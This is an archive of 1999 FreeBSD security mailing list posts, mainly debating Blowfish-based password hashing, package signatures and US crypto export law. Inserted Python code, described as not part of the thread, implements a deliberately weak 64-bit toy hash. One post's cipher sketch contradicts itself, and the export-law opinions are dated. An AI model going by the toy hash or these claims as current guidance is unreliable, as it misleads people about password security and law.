-0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Moved to -chat - please try to hold the lists reasonably to their topic. On Sun, May 02, 1999 at 12:21:43PM -0400, Bryan Fullerton wrote: > On Sun, May 02, 1999 at 06:16:47PM +0200, Eivind Eklund wrote: > > > > The point of this exercise would (IMO, at least) only be OpenBSD > > compatibility, where OpenBSD for marketeering reasons has decided to > > use Blowfish as part of their hash algorithm. 
If people can't migrate > > their password files, they are much less likely to migrate to FreeBSD, > > which means we should support their password formats if feasible. > > Are there many people migrating from OpenBSD to FreeBSD? I don't know - but the chance of there being many of them increases if there is a simple way for them to migrate. This needs to include the ability to keep their old password files. Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 9:46:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id 797F514D9E for ; Sun, 2 May 1999 09:46:27 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id SAA17858; Sun, 2 May 1999 18:46:26 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id SAA33620; Sun, 2 May 1999 18:46:26 +0200 (MET DST) Date: Sun, 2 May 1999 18:46:25 +0200 From: Eivind Eklund To: Mark Murray Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish Message-ID: <19990502184625.E32819@bitbox.follo.net> References: <21634.925539195@critter.freebsd.dk> <19990502144906.E23950@bitbox.follo.net> <199905021458.QAA02696@greenpeace.grondar.za> <19990502170929.B32819@bitbox.follo.net> <199905021541.RAA02885@greenpeace.grondar.za> <19990502181647.C32819@bitbox.follo.net> <199905021627.SAA03150@greenpeace.grondar.za> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <199905021627.SAA03150@greenpeace.grondar.za>; from Mark Murray on Sun, May 02, 1999 at 06:27:29PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 02, 1999 at 06:27:29PM +0200, Mark Murray wrote: > Eivind Eklund wrote: > > As for the libcrypto naming 
conflict - is the Kerberos libcrypto used > > by things outside Kerberos, or is it feasible to rename it? When I > > get around to integrating the signature support into pkg_* (I have > > code that works in a test environment, but haven't had time to > > integrate it), we'll need libcrypto from OpenSSL in order to support > > signatures - and renaming it in the port would IMO be fairly evil. > > Ditto for Kerberos, and Kerberos got there first :-) I know - I'm trying to find the lesser of the two evils. That's why I was asking if it was used outside of Kerberos itself. > How do your signatures work? Can you not just use the MD? and SHA > algorithms out of libmd? If not, can we not extend libmd? They use x.509 and the Sun package signature standard. As far as I remember, it would be possible to re-implement parts of the code based on something other than x.509 (e.g., DSA) and still be marginally compliant (no other tools would work, but the standard allows alternate signature algorithms, and signatures based on several public key systems on the same package). However, that would be more work than I'll have time for in the foreseeable future :-( The code was written with the assumption that we could make it work by just requiring the libcrypto from (then) SSLeay in order to actually do any signature checking by just opening it dynamically and checking signatures if it was there. The signatures aren't "mine", BTW - the code was written by one of my co-workers (rmz@yes.no) on company time. Eivind. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 9:56:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (Postfix) with ESMTP id 88283153AE; Sun, 2 May 1999 09:56:12 -0700 (PDT) (envelope-from mark@grondar.za) Received: from greenpeace.grondar.za (greenpeace.grondar.za [196.7.18.132]) by gratis.grondar.za (8.9.3/8.9.3) with ESMTP id SAA36566; Sun, 2 May 1999 18:56:11 +0200 (SAST) (envelope-from mark@grondar.za) Received: from grondar.za (localhost [127.0.0.1]) by greenpeace.grondar.za (8.9.3/8.9.3) with ESMTP id SAA03362; Sun, 2 May 1999 18:56:10 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199905021656.SAA03362@greenpeace.grondar.za> To: Eivind Eklund Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-Reply-To: Your message of " Sun, 02 May 1999 18:46:25 +0200." <19990502184625.E32819@bitbox.follo.net> References: <21634.925539195@critter.freebsd.dk> <19990502144906.E23950@bitbox.follo.net> <199905021458.QAA02696@greenpeace.grondar.za> <19990502170929.B32819@bitbox.follo.net> <199905021541.RAA02885@greenpeace.grondar.za> <19990502181647.C32819@bitbox.follo.net> <199905021627.SAA03150@greenpeace.grondar.za> <19990502184625.E32819@bitbox.follo.net> Date: Sun, 02 May 1999 18:56:09 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Eivind Eklund wrote: > > Ditto for Kerberos, and Kerberos got there first :-) > > I know - I'm trying to find the lesser of the two evils. That's why I > was asking if it was used outside of Kerberos itself. Only kerberised tools like X, fetchmail, sudo, oracle and so on. :-) > They use x.509 and the Sun package signature standard. 
> As far as I remember, it would be possible to re-implement parts of the
> code based on something other than x.509 (e.g., DSA) and still be
> marginally compliant (no other tools would work, but the standard allows
> alternate signature algorithms, and signatures based on several public
> key systems on the same package). However, that would be more work than
> I'll have time for in the foreseeable future :-(

Hmm - some of that stuff can be added to libmd with ease :-)

> The code was written with the assumption that we could make it work by
> just requiring the libcrypto from (then) SSLeay in order to actually
> do any signature checking by just opening it dynamically and check
> signatures if it was there.

May I see the code?

M
--
Mark Murray
Join the anti-SPAM movement: http://www.cauce.org

From owner-freebsd-security Sun May 2 10:00:55 1999
Date: Sun, 2 May 1999 19:00:50 +0200
From: Eivind Eklund
To: Mark Murray
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish
Message-ID: <19990502190049.G32819@bitbox.follo.net>
In-Reply-To: <199905021656.SAA03362@greenpeace.grondar.za>; from Mark Murray on Sun, May 02, 1999 at 06:56:09PM +0200

On Sun, May 02, 1999 at 06:56:09PM +0200, Mark Murray wrote:
> > The code was written with the assumption that we could make it work by
> > just requiring the libcrypto from (then) SSLeay in order to actually
> > do any signature checking by just opening it dynamically and check
> > signatures if it was there.
>
> May I see the code?

Sure - I put it at http://www.freebsd.org/~eivind/pkg_install.tar.gz

Eivind.

From owner-freebsd-security Sun May 2 10:16:16 1999
Message-Id: <199905021716.TAA03488@greenpeace.grondar.za>
To: Eivind Eklund
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish
In-Reply-To: Your message of "Sun, 02 May 1999 19:00:50 +0200."
  <19990502190049.G32819@bitbox.follo.net>
Date: Sun, 02 May 1999 19:16:05 +0200
From: Mark Murray

Eivind Eklund wrote:
> > May I see the code?
>
> Sure - I put it at http://www.freebsd.org/~eivind/pkg_install.tar.gz

Nope. 404.

M
--
Mark Murray
Join the anti-SPAM movement: http://www.cauce.org

From owner-freebsd-security Sun May 2 10:17:45 1999
Date: Sun, 2 May 1999 19:17:40 +0200
From: Eivind Eklund
To: Mark Murray
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish
Message-ID: <19990502191740.J32819@bitbox.follo.net>
In-Reply-To: <199905021716.TAA03488@greenpeace.grondar.za>; from Mark Murray on Sun, May 02, 1999 at 07:16:05PM +0200

On Sun, May 02, 1999 at 07:16:05PM +0200, Mark Murray wrote:
> Eivind Eklund wrote:
> > > May I see the code?
> >
> > Sure - I put it at http://www.freebsd.org/~eivind/pkg_install.tar.gz
>
> Nope. 404.

Sorry - the correct URL is http://www.freebsd.org/~eivind/pkg_install.tgz

My bad - I'm not in the habit of using .tgz as an extension, but the
archive was created by one of my coworkers.

Eivind.

From owner-freebsd-security Sun May 2 10:29:40 1999
Message-Id: <199905021729.TAA03576@greenpeace.grondar.za>
To: Eivind Eklund
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish
In-Reply-To: Your message of "Sun, 02 May 1999 19:17:40 +0200."
  <19990502191740.J32819@bitbox.follo.net>
Date: Sun, 02 May 1999 19:29:29 +0200
From: Mark Murray

Eivind Eklund wrote:
> Sorry - the correct URL is
> http://www.freebsd.org/~eivind/pkg_install.tgz

Gottit, thanks! :-)

M
--
Mark Murray
Join the anti-SPAM movement: http://www.cauce.org

From owner-freebsd-security Sun May 2 12:48:55 1999
Date: Sun, 2 May 1999 15:48:52 -0400 (EDT)
From: Dug Song
To: Eivind Eklund
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish
In-Reply-To: <19990502122142.A289@samurai.com>

On Sun, May 02, 1999 at 06:16:47PM +0200, Eivind Eklund wrote:
> The point of this exercise would (IMO, at least) only be OpenBSD
> compatibility,
> where OpenBSD for marketeering reasons has decided to use Blowfish as
> part of their hash algorithm.

marketeering? read the paper being presented by Niels Provos and David
Mazieres at next month's USENIX (FREENIX track), and decide for yourself -
"A Future-Adaptable Password Scheme":

	http://www.citi.umich.edu/u/provos/papers/bcrypt.ps.gz

this could be rolled into pam_unix for FreeBSD, perhaps.

-d.

---
http://www.monkey.org/~dugsong/

From owner-freebsd-security Sun May 2 14:07:24 1999
Message-Id: <199905022105.RAA09266@quark.ChrisBowman.com>
Date: Sun, 02 May 1999 17:04:09 -0400
To: "Jeroen C. van Gelderen"
From: "Christopher R. Bowman"
Subject: Re: Blowfish/Twofish
Cc: "Harry M. Leitzell", The Tech-Admin Dude, Brian Beaulieu, freebsd-security@FreeBSD.ORG
In-Reply-To: <372C2001.BEA307F6@vangelderen.org>

At 11:50 AM 5/2/99 +0200, Jeroen C. van Gelderen wrote:
> "Harry M. Leitzell" wrote:
> > 2) Can we still do the moving by paper to another
> > country and scanning it in? Is that legitimate or
> > been deemed illegal?
>
> Yes and no. Yes, if you publish it it is covered by the first
> amendment and you can freely export the book.
> But you will have to *publish* the crypto, just printing it in a letter
> is not good enough. Fortunately, getting your 'work' published is not
> that hard; there are companies that specialize in low volume
> printing...

I believe this is an under-broad interpretation of the 1st Amendment. If
you publish it as a book it is certainly covered, but the contrapositive is
not also true. Saying that it must be published as a book would be
analogous to saying that the New York Times is entitled to free speech but
I am not, simply by virtue of the fact that they can afford those big (or
indeed any) presses and I must write my work out in longhand.

Can you provide more information regarding how you came to the above
conclusion?

--------
Christopher R. Bowman
crb@ChrisBowman.com
http://www.ChrisBowman.com/

From owner-freebsd-security Sun May 2 15:38:53 1999
Message-ID: <372CD3E1.9AA3444D@vangelderen.org>
Date: Mon, 03 May 1999 00:38:25 +0200
From: "Jeroen C. van Gelderen"
To: "Christopher R. Bowman"
Cc: "Harry M.
Leitzell", The Tech-Admin Dude, Brian Beaulieu, freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish

[This is getting off-topic...]

"Christopher R. Bowman" wrote:
> At 11:50 AM 5/2/99 +0200, Jeroen C. van Gelderen wrote:
> > "Harry M. Leitzell" wrote:
> > > 2) Can we still do the moving by paper to another
> > > country and scanning it in? Is that legitimate or
> > > been deemed illegal?
> >
> > Yes and no. Yes, if you publish it it is covered by the first
> > amendment and you can freely export the book. But you will have
> > to *publish* the crypto, just printing it in a letter is not good
> > enough. Fortunately, getting your 'work' published is not that
> > hard; there are companies that specialize in low volume
> > printing...
>
> I believe this is an under-broad interpretation of the 1st Amendment. If you
> publish it as a book it is certainly covered but the contrapositive is not
> also true. Saying that it must be published as a book would be analogous to
> saying that the New York Times is entitled to free speech but I am not simply
> by virtue of the fact that they can afford those big (or indeed any) presses
> and I must write my work out in longhand.

Unfortunately, there is a difference between the rights you have and the
rights your government wants you to have. The first amendment probably gives
you the right to export cryptographic source code, but are you prepared to
and do you have the money+time to defend those rights in court?

Check out http://www.eff.org/ and http://www.epic.org/ for more information
on how the US government deals with cryptographic matters, your rights and
the constitution. Don't discuss it on this list though, it's getting
off-topic.
> Can you provide more information regarding how you came to the above
> conclusion?

The NAI people in charge of exporting PGP (on paper) told me. But let me
repeat that I'm not qualified to give you legal advice. I'm basically
telling you to err on the safe side...

Cheers,
Jeroen
--
Jeroen C. van Gelderen - jeroen@vangelderen.org - 0xC33EDFDE

From owner-freebsd-security Sun May 2 17:44:09 1999
Message-ID: <372CF161.B9FFE751@TurnAround.com.au>
Date: Mon, 03 May 1999 10:44:17 +1000
From: Andrew Johns
Organization: TurnAround Solutions P/L
To: Gustavo V G C Rios
Cc: security@FreeBSD.ORG
Subject: Re: security advisories

Gustavo V G C Rios wrote:
> The page http://www.freebsd.org/security/ has some advisories, but how
> can i work with them? How to read the *.asc files? Which softwares
> should i use to read them ?
>
> Thanks a lot!
They are plain text files - try cat, more, vi in Unix, or something capable
of fixing the CR <-> CRLF in the M$ world

--
Regards                              |  _/\_/\
Andrew Johns BSc (Comp Sci)          | /      \
TurnAround Solutions Pty Ltd         | \_...__/
http://www.turnaround.com.au/        |    \/
"The box said 'Requires Windows 98, NT, Linux or better' so I installed FreeBSD."

From owner-freebsd-security Sun May 2 18:33:56 1999
To: Gustavo V G C Rios
Cc: security@FreeBSD.ORG
Subject: Re: security advisories
From: Dag-Erling Smorgrav
Date: 03 May 1999 03:33:37 +0200
In-Reply-To: Gustavo V G C Rios's message of "Sat, 01 May 1999 20:14:18 -0300"

Gustavo V G C Rios writes:
> The page http://www.freebsd.org/security/ has some advisories, but how
> can i work with them? How to read the *.asc files? Which softwares
> should i use to read them ?

The .asc files are not human-readable - they're cryptographic signatures
intended to authenticate the originator of each advisory. I believe they're
PGP signatures - to verify them, I guess you would first add the relevant
PGP keys to your keyring, then submit the advisory and the signature to
PGP. The PGP keys used by the FreeBSD security officers are included in the
FreeBSD handbook.
DES
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

From owner-freebsd-security Sun May 2 18:42:32 1999
Date: Sun, 2 May 1999 21:54:31 -0400
From: Adam Shostack
To: "Jeroen C. van Gelderen"
Cc: Robert Watson, Poul-Henning Kamp, The Tech-Admin Dude, Brian Beaulieu, freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish
Message-ID: <19990502215431.A22973@weathership.homeport.org>
In-Reply-To: <372C19F5.625BB2B@vangelderen.org>; from Jeroen C. van Gelderen on Sun, May 02, 1999 at 11:25:09AM +0200

On Sun, May 02, 1999 at 11:25:09AM +0200, Jeroen C. van Gelderen wrote:
| Robert Watson wrote:
| [...]
| > I'd recommend against using Blowfish--go for Twofish.
|
| Regardless of what you think about Blowfish, recommending Twofish
| is a very, very bad move. The golden rule in crypto is that trust
| comes with the age of an algorithm. Twofish is waaaay too young to
| be trusted, especially since it's an evolutionary improvement
| over Blowfish which you don't like for some reason.
|
| In any case, if you recommend against using Blowfish, what's the
| reason?

The reason not to use Blowfish is (imho) the Pi key scheduling. Key
schedules need to be designed, not taken at random from nature.
The reason to not use it for passwords is that the function you want (if
you're going to not change the model) is a hash function, not a block
cipher.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
                                                       -Hume

From owner-freebsd-security Sun May 2 18:59:53 1999
Date: Mon, 3 May 1999 11:30:12 +0930 (CST)
From: Kris Kennaway
To: Adam Shostack
Cc: "Jeroen C. van Gelderen", Robert Watson, Poul-Henning Kamp, The Tech-Admin Dude, Brian Beaulieu, freebsd-security@freebsd.org
Subject: Re: Blowfish/Twofish
In-Reply-To: <19990502215431.A22973@weathership.homeport.org>

On Sun, 2 May 1999, Adam Shostack wrote:
> The reason not to use Blowfish is (imho) the Pi key scheduling. Key
> schedules need to be designed, not taken at random from nature.

Regardless, it seems to have stood up pretty well to cryptanalysis so far -
see www.counterpane.com for literature references.

> The reason to not use it for passwords is that the function you want
> (if you're going to not change the model), is a hash function, not a
> block cipher.
I was under the impression that there are standard methods for converting
good block ciphers into good hash functions - I'd be surprised if this
wasn't what was being done with the OpenBSD password support.

Kris

-----
"That suit's sharper than a page of Oscar Wilde witticisms that's been
rolled up into a point, sprinkled with lemon juice and jabbed into
someone's eye"
"Wow, That's sharp!"
 - Rimmer and the Cat, _Red Dwarf_

From owner-freebsd-security Sun May 2 19:03:04 1999
Date: Mon, 3 May 1999 12:02:44 +1000
From: Peter Jeremy
Subject: Re: Blowfish/Twofish
To: adam@homeport.org
Cc: freebsd-security@FreeBSD.ORG
Message-Id: <99May3.114810est.40331@border.alcanet.com.au>

Adam Shostack wrote:
> The reason to not use it for passwords is that the function you want
> (if you're going to not change the model), is a hash function, not a
> block cipher.

You'd better let Bob Morris know this :-). Why can't a block cipher (like,
say, DES) be used for a password hashing function? (I realise that the DES
used for Unix password hashing is `tweaked', but that was done solely to
prevent people using off-the-shelf DES hardware to crack passwords - the
salt can be injected in several other ways).

The MD5 description includes a simple algorithm for taking an arbitrary
string of bits and feeding it through a block hash function. Exactly the
same can be done with a block cipher.
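Peter Jeremy's point above, and Kris Kennaway's question about the standard block-cipher-to-hash methods, written out as an added example that is not from the thread: a small block cipher is turned into a hash with the Davies-Meyer construction (message block as the cipher key, chaining value as the plaintext, feed-forward XOR) and MD5-style length padding. XTEA as the cipher, the fixed IV and the 64-bit digest are my choices for illustration, not anything FreeBSD or OpenBSD ships; the feed-forward XOR is exactly what removes the invertibility Adam objects to, which the test checks by decrypting the cipher but not the hash.

```python
import struct

MASK32 = 0xFFFFFFFF
DELTA = 0x9E3779B9
ROUNDS = 32


def xtea_encrypt(key: bytes, block: bytes) -> bytes:
    """XTEA block cipher: 128-bit key, 64-bit block, 32 Feistel rounds (big-endian words)."""
    k = struct.unpack(">4I", key)
    v0, v1 = struct.unpack(">2I", block)
    s = 0
    for _ in range(ROUNDS):
        v0 = (v0 + ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + k[s & 3]))) & MASK32
        s = (s + DELTA) & MASK32
        v1 = (v1 + ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + k[(s >> 11) & 3]))) & MASK32
    return struct.pack(">2I", v0, v1)


def xtea_decrypt(key: bytes, block: bytes) -> bytes:
    """Inverse of xtea_encrypt: a cipher is reversible by design, which a hash must not be."""
    k = struct.unpack(">4I", key)
    v0, v1 = struct.unpack(">2I", block)
    s = (DELTA * ROUNDS) & MASK32
    for _ in range(ROUNDS):
        v1 = (v1 - ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + k[(s >> 11) & 3]))) & MASK32
        s = (s - DELTA) & MASK32
        v0 = (v0 - ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + k[s & 3]))) & MASK32
    return struct.pack(">2I", v0, v1)


def md_pad(msg: bytes, block_size: int = 16) -> bytes:
    """Merkle-Damgard strengthening as in MD5: 0x80, zero fill, 64-bit big-endian bit length.

    The length field is what keeps "abc" and "abc\\x80..." from hashing alike.
    """
    padded = msg + b"\x80"
    padded += b"\x00" * ((block_size - 8 - len(padded)) % block_size)
    return padded + struct.pack(">Q", len(msg) * 8)


IV = bytes.fromhex("0123456789abcdef")  # constructed fixed IV (my assumption); any public constant works


def davies_meyer_hash(msg: bytes) -> bytes:
    """Davies-Meyer: H_i = E_{M_i}(H_{i-1}) XOR H_{i-1}, one 16-byte message block per step.

    Output is 64 bits because XTEA's block is 64 bits; far too short for real use,
    but the construction is the same one used to build hashes from wider ciphers.
    """
    h = IV
    padded = md_pad(msg)
    for i in range(0, len(padded), 16):
        m = padded[i:i + 16]                    # the message block is the cipher KEY
        e = xtea_encrypt(m, h)                  # the chaining value is the PLAINTEXT
        h = bytes(a ^ b for a, b in zip(e, h))  # feed-forward XOR makes the step one-way
    return h


def salted_hash(salt: bytes, password: bytes) -> str:
    """Salt injected by prefixing: one of the 'several other ways' Peter mentions."""
    return davies_meyer_hash(salt + password).hex()


if __name__ == "__main__":
    # Constructed demo values.
    print("hash('abc') =", davies_meyer_hash(b"abc").hex())
    print("salted      =", salted_hash(b"Ab", b"correct horse"))
```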
Peter

From owner-freebsd-security Sun May 2 23:10:26 1999
Date: Mon, 3 May 1999 17:00:03 +0000 (GMT)
From: 0x1c
To: "Harry M. Leitzell"
Cc: Robert Watson, Poul-Henning Kamp, The Tech-Admin Dude, Brian Beaulieu, freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish

On a similar note, is there any restriction on one-way hashing algorithms?
I forget.

Nick

On Sat, 1 May 1999, Harry M. Leitzell wrote:
> I am unaware of the restriction laws placed upon the US in terms of
> encryption. Could someone clarify them for me?
>
> 1) If Robert were to write code on a machine that is in a foreign
> country, would it have been considered exported? (Xterm on a cs.hut.fi
> machine for example to code in) Even if he is in the US while doing so?
>
> 2) Can we still do the moving by paper to another country and
> scanning it in? Is that legitimate or been deemed illegal?
>
> 3) If I write a disk encryptor that sits on the MBR and transfer the
> disk out of country, is that a no-no?
>
> Thanks
>
> On Sat, 1 May 1999, Robert Watson wrote:
> > So I'd gladly write this code, as well as do a number of other
> > crypto-related things, but I'm inside the US. Someone outside the US will
> > have to take this initiative, I'm afraid.
> >
> > I'd recommend against using Blowfish--go for Twofish.
> >
> > On Sat, 1 May 1999, Poul-Henning Kamp wrote:
> > > In message , The Tech-Admin Dude writes:
> > > > This is something i've wanted to know for a long time :).. It should adopt
> > > > the passwd.conf settings from OpenBSD with selection of encryption, ratio,
> > > > etc.. OpenBSD has a very good feature with that and it would be great if
> > > > FreeBSD adopted it! :-)
> > >
> > > Make patches
> > > send-pr
> > >
> > > --
> > > Poul-Henning Kamp             FreeBSD coreteam member
> > > phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
> > > FreeBSD -- It will take a long time before progress goes too far!
> >
> > Robert N Watson
> > robert@fledge.watson.org              http://www.watson.org/~robert/
> > PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
> > Carnegie Mellon University            http://www.cmu.edu/
> > TIS Labs at Network Associates, Inc.  http://www.tis.com/
> > Safeport Network Services             http://www.safeport.com/
>
> [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-]
> Harry M. Leitzell - Harry_M_Leitzell@cmu.edu
> Carnegie Mellon University
> Finger for PGP Public Key
> [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-]

--
Therefore those skilled at the unorthodox are as infinite as heaven and
earth, inexhaustible as the great rivers.
 -- Sun Tzu, The Art of War

From owner-freebsd-security Sun May 2 23:14:33 1999
Date: Mon, 3 May 1999 02:11:02 -0400 (EDT)
From: Robert Watson
Reply-To: Robert Watson
To: 0x1c
Cc: "Harry M. Leitzell", Poul-Henning Kamp, The Tech-Admin Dude, Brian Beaulieu, freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish

I don't believe so, as long as they are not just crypto algorithms. I.e., I
believe our DES hashing is not exportable, whereas our MD5 hashing is. In a
sense, it's all a matter of perspective on how you use an algorithm. It's
all just mathematics, right? Sort of like you can't patent mathematical
formulas, but you can patent algorithms. :) So SHA-1 support for FreeBSD
would be quite exportable, I'd imagine, and would probably make a
worthwhile addition. I don't see Blowfish as a great addition other than
the interoperability concerns expressed previously.

Far more important, in my mind, is making the IPsec/IPv6 code part of the
base distribution. If I really want your password, I'll sniff it or trojan
a binary once I have root, something that I already have to have to get
your password file in almost all cases.
On Mon, 3 May 1999, 0x1c wrote:
> On a similar note, is there any restriction on one-way hashing algorithms?
> I forget.
>
> Nick
>
> On Sat, 1 May 1999, Harry M. Leitzell wrote:
> > I am unaware of the restriction laws placed upon the US in terms of
> > encryption. Could someone clarify them for me?
> >
> > 1) If Robert were to write code on a machine that is in a foreign
> > country, would it have been considered exported? (Xterm on a cs.hut.fi
> > machine for example to code in) Even if he is in the US while doing so?
> >
> > 2) Can we still do the moving by paper to another country and
> > scanning it in? Is that legitimate or been deemed illegal?
> >
> > 3) If I write a disk encryptor that sits on the MBR and transfer the
> > disk out of country, is that a no-no?
> >
> > Thanks
> >
> > On Sat, 1 May 1999, Robert Watson wrote:
> > > So I'd gladly write this code, as well as do a number of other
> > > crypto-related things, but I'm inside the US. Someone outside the US will
> > > have to take this initiative, I'm afraid.
> > >
> > > I'd recommend against using Blowfish--go for Twofish.
> > >
> > > On Sat, 1 May 1999, Poul-Henning Kamp wrote:
> > > > In message , The Tech-Admin Dude writes:
> > > > > This is something i've wanted to know for a long time :).. It should adopt
> > > > > the passwd.conf settings from OpenBSD with selection of encryption, ratio,
> > > > > etc.. OpenBSD has a very good feature with that and it would be great if
> > > > > FreeBSD adopted it! :-)
> > > >
> > > > Make patches
> > > > send-pr
> > > >
> > > > --
> > > > Poul-Henning Kamp             FreeBSD coreteam member
> > > > phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
> > > > FreeBSD -- It will take a long time before progress goes too far!
> > >
> > > Robert N Watson
> > > robert@fledge.watson.org              http://www.watson.org/~robert/
> > > PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
> > > Carnegie Mellon University            http://www.cmu.edu/
> > > TIS Labs at Network Associates, Inc.  http://www.tis.com/
> > > Safeport Network Services             http://www.safeport.com/
> >
> > [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-]
> > Harry M. Leitzell - Harry_M_Leitzell@cmu.edu
> > Carnegie Mellon University
> > Finger for PGP Public Key
> > [-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-]
>
> --
> Therefore those skilled at the unorthodox are as infinite as heaven and
> earth, inexhaustible as the great rivers. -- Sun Tzu, The Art of War

Robert N Watson
robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.
http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 23:22:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.226]) by hub.freebsd.org (Postfix) with ESMTP id 554C214C9E for ; Sun, 2 May 1999 23:22:29 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id CAA06444; Mon, 3 May 1999 02:05:30 -0400 (EDT) From: "Allen Smith" Message-Id: <9905030205.ZM6442@beatrice.rutgers.edu> Date: Mon, 3 May 1999 02:05:30 -0400 In-Reply-To: Robert Watson "Re: Blowfish/Twofish" (May 3, 1:58am) References: X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: Robert Watson , 0x1c Subject: Re: Blowfish/Twofish Cc: freebsd-security@FreeBSD.ORG Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 3, 1:58am, Robert Watson (possibly) wrote: > > I don't believe so, as long as they are not just crypto algorithms. I.e., > I believe our DES hashing is not exportable, whereas our MD5 hashing is. > In a sense, it's all a matter of perspective on how you use an algorithm. > It's all just mathematics, right? Sort of like you can't patent > mathematical formulas, but you can patent algorithms. :) So SHA-1 support > for FreeBSD would be quite exportable, I'd imagine, and would probably > make a worthwhile addition. I don't see Blowfish as a great addition > other than the interoperability concerns expressed previously. > On Mon, 3 May 1999, 0x1c wrote: > > > On a similar note, is there any restriction on one-way hashing algorithms? > > I forget. > > > > Nick One can use any cryptographically secure one-way hash function as a (secret key) encryption method. 
The procedure is as follows:

Sender and recipient have shared secret key K. They want to transmit
information I. Sender takes three-bit chunks (the most efficient size)
of information I, finds a random salt S of sufficient size for each
chunk, and does:

	hash(K S I-chunk)

then sends the result and the random salt to the recipient. Recipient
then looks for the 2-bit combination that hashed as above along with
the secret and the key gives the result.

	-Allen

--
Allen Smith			easmith@beatrice.rutgers.edu

From owner-freebsd-security Sun May 2 23:25:59 1999
Received: from alcanet.com.au (border.alcanet.com.au [203.62.196.10]) by hub.freebsd.org (Postfix) with ESMTP id A748014C9E for ; Sun, 2 May 1999 23:25:55 -0700 (PDT) (envelope-from peter.jeremy@auss2.alcatel.com.au)
Received: by border.alcanet.com.au id <40332>; Mon, 3 May 1999 16:11:09 +1000
Date: Mon, 3 May 1999 16:25:45 +1000
From: Peter Jeremy
Subject: Re: Blowfish/Twofish
To: nick@shibumi.feralmonkey.org
Cc: freebsd-security@FreeBSD.ORG
Message-Id: <99May3.161109est.40332@border.alcanet.com.au>

0x1c wrote:
>On a similar note, is there any restriction on one-way hashing algorithms?
>I forget.

AFAIK, there isn't. MD4, MD5, SHA-1 etc appear to all be freely
exportable. The export restrictions appear to be on crypto for
`secrecy', whilst crypto for `authentication' is unrestricted.
(This does suggest that some lessons in basic cryptography are
needed around the US State Department).

Note: IANAL and free legal advice is worth what you paid for it.
Peter

From owner-freebsd-security Sun May 2 23:31:41 1999
Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.226]) by hub.freebsd.org (Postfix) with ESMTP id 320D315A68 for ; Sun, 2 May 1999 23:31:39 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu)
Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id CAA06496; Mon, 3 May 1999 02:14:40 -0400 (EDT)
From: "Allen Smith"
Message-Id: <9905030214.ZM6494@beatrice.rutgers.edu>
Date: Mon, 3 May 1999 02:14:40 -0400
In-Reply-To: Peter Jeremy "Re: Blowfish/Twofish" (May 3, 2:09am)
References: <99May3.161109est.40332@border.alcanet.com.au>
